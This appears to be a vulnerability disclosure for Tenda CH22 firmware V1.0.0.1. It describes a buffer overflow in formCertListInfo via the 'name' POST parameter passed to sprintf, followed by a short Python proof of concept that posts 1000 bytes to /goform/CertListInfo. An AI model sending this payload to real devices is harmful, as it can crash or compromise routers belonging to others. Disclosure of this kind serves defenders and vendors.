CH22 V1.0.0.1
The Tenda CH22 V1.0.0.1 firmware has a buffer overflow vulnerability in the formCertListInfo function. The V12 variable receives the name parameter from a POST request and is later passed to the sprintf function. However, since the user can control the input of name , the statement sprintf(s, "/etc/cert/%s", v12); can cause a buffer overflow.


import requests
ip = "192.168.1.1"
url = f'http://{ip}/goform/CertListInfo'
payload = b'a' * 1000
data = {
'name':payload
}
requests.post(url, data=data)
